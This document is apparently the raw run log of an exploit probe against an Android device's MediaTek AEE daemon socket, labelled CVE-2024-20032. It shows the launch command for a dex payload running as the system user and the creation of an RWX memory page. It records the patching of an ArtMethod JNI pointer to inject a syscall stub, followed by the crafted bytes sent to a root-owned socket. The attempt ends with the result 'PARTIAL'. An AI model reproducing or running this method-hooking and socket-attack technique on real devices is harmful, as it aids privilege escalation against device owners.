command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --ind=14 --class=1002
probe=aee-session
dex_md5=1f539ab010edb2403a970cda7022cc2e
dex_sha256=c8a027f7f314d062acad20ea437c9dabbc06a419172206be463f37eea276000d
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
1f539ab010edb2403a970cda7022cc2e  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=22692 target_pid=22692 class=1002 ind_cmd=14
[+] Scratch buffer at 0x702d16c000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x702cfee000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x7028a0da20
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x6d7281a2c0
    entry_point    = 0x103800087597c358
[*] Patching data_ (JNI) → 0x702cfee000
    data_       = 0x702cfee000 ✓
    entry_point = 0x103800087597c358 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[phase1] connecting to @android:aee_aed
[+] connected, peer_uid=0
[phase2] sending AE_IND header (ind_cmd=14, pid=22692, class=1002)
[+] IND sent: 02 00 00 00 0e 00 00 00 a4 58 00 00 ea 03 00 00 00 00 00 00 00 00 00 00
[phase3] entering REQ/RSP loop (max_reqs=30)
[loop] read timeout / EOF after 0 reqs
[done] session_done=false reqs_handled=0
[phase4] checking /data/vendor/aee_exp/ for new entry
[aee_exp] directory not accessible
[result] CVE_2024_20032=PARTIAL — connected but no REQs received
